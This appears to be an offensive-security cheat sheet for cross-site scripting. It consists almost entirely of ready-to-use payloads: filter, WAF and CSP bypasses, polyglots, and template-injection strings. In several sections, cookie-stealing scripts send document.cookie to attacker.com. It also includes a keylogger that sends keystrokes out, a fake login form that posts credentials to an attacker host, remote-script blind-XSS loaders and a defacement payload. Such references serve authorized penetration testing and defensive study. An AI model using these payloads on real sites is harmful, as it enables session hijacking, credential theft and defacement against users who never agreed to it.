โ† All cheat sheets

XSS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

BASIC PAYLOADS#

<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>

EVENT HANDLERS#

# img tag
<img src=x onerror=alert(1)>
<img src=x onerror="alert(1)">
<img/src=x onerror=alert(1)>
<img src=x onload=alert(1)>

# svg tag
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload="alert(1)">
<svg><script>alert(1)</script></svg>

# body tag
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)>

# input tag
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<input type=image src=x onerror=alert(1)>

# details tag
<details open ontoggle=alert(1)>

# marquee tag
<marquee onstart=alert(1)>

# video/audio
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<video><source onerror=alert(1)>

# iframe
<iframe onload=alert(1)>
<iframe src="javascript:alert(1)">

# object/embed
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">

# math
<math href="javascript:alert(1)">click</math>

# table
<table background="javascript:alert(1)">

HREF/SRC ATTRIBUTES#

<a href="javascript:alert(1)">click</a>
<a href="data:text/html,<script>alert(1)</script>">click</a>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a>

# Form action
<form action="javascript:alert(1)"><input type=submit>
<form><button formaction="javascript:alert(1)">click</button>

# Base tag
<base href="javascript:alert(1)//">

DOM-BASED XSS#

# Common sinks
document.write()
document.writeln()
element.innerHTML
element.outerHTML
element.insertAdjacentHTML()
eval()
setTimeout()
setInterval()
new Function()
location.href
location.assign()
location.replace()

# Common sources
document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location.href
location.search
location.hash
document.cookie
document.referrer
window.name

# Payloads
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>

FILTER BYPASS#

# Case variation
<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert(1)</SCRIPT>

# No quotes
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>

# No parentheses
<img src=x onerror=alert`1`>
<img src=x onerror=throw/a]onerror=alert(1)//>
<script>onerror=alert;throw 1</script>

# No spaces
<svg/onload=alert(1)>
<img/src=x/onerror=alert(1)>

# HTML encoding
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>

# URL encoding
<a href="javascript:%61%6c%65%72%74(1)">click</a>

# Double encoding
%253Cscript%253Ealert(1)%253C/script%253E

# Unicode encoding
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>

# Null bytes
<scr%00ipt>alert(1)</script>

# Newlines/tabs
<img src=x onerror
=alert(1)>
<script>al	ert(1)</script>

# Comments
<script>/**/alert(1)/**/</script>
<!--><script>alert(1)</script>

POLYGLOTS#

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

'">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%telerik;telerik>'>">
<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script>

<script>fetch('http://attacker.com/steal?c='+document.cookie)</script>

<script>new Image().src='http://attacker.com/steal.php?c='+document.cookie</script>

<img src=x onerror="this.src='http://attacker.com/steal.php?c='+document.cookie">

KEYLOGGER#

<script>
document.onkeypress=function(e){
  fetch('http://attacker.com/log?k='+e.key);
}
</script>

PHISHING/DEFACEMENT#

<script>document.body.innerHTML='<h1>Hacked</h1>'</script>

<script>
document.body.innerHTML='<form action="http://attacker.com/steal"><input name="user" placeholder="Username"><input name="pass" type="password" placeholder="Password"><input type="submit"></form>';
</script>

TEMPLATE INJECTION#

# AngularJS
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}

# Vue.js
{{_c.constructor('alert(1)')()}}

# React (dangerouslySetInnerHTML)
<div dangerouslySetInnerHTML={{__html: '<img src=x onerror=alert(1)>'}}/>

CONTEXT ESCAPING#

# Inside JavaScript string
';alert(1)//
\';alert(1)//
</script><script>alert(1)</script>

# Inside HTML attribute
" onmouseover=alert(1)
' onmouseover=alert(1)
" onfocus=alert(1) autofocus="
' onfocus=alert(1) autofocus='

# Inside href
javascript:alert(1)
data:text/html,<script>alert(1)</script>

# Inside script block
</script><script>alert(1)</script>

# Inside style
</style><script>alert(1)</script>

MUTATION XSS#

<noscript><p title="</noscript><script>alert(1)</script>">
<svg><![CDATA[><script>alert(1)</script>]]></svg>

BLIND XSS PAYLOADS#

# XSS Hunter style
"><script src=https://yoursubdomain.xss.ht></script>
<script src=https://yoursubdomain.xss.ht></script>
'"><script src=https://yoursubdomain.xss.ht></script>

# Custom callback
<script>fetch('https://attacker.com/xss?url='+encodeURIComponent(location.href)+'&cookie='+encodeURIComponent(document.cookie))</script>

WAF BYPASS TECHNIQUES#

# JavaScript without parentheses
<script>onerror=alert;throw 1</script>
<script>throw/a]onerror=alert(1)//</script>

# Without alert/confirm/prompt
<script>[].constructor.constructor("return this")().alert(1)</script>
<script>self['ale'+'rt'](1)</script>
<script>top['al'+'ert'](1)</script>

# Without script tag
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>

# Obfuscation
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

CSP BYPASS#

# If 'unsafe-inline' is set
<script>alert(1)</script>

# If 'unsafe-eval' is set
<script>eval('alert(1)')</script>

# JSONP endpoints
<script src="https://allowed.com/jsonp?callback=alert"></script>

# Angular (if allowed)
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js"></script>
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>

# Base tag
<base href="http://attacker.com/">

TESTING CHECKLIST#

[ ] Reflected XSS in URL parameters
[ ] Reflected XSS in form inputs
[ ] Stored XSS in user profiles
[ ] Stored XSS in comments/posts
[ ] DOM-based XSS
[ ] XSS in file uploads (filename, SVG)
[ ] XSS in error messages
[ ] XSS in HTTP headers (Referer, User-Agent)
[ ] XSS in JSON responses
[ ] XSS in XML responses
[ ] Filter/WAF bypass attempts
[ ] CSP bypass attempts

TOOLS#

- XSStrike
- Dalfox
- XSS Hunter
- Burp Suite
- OWASP ZAP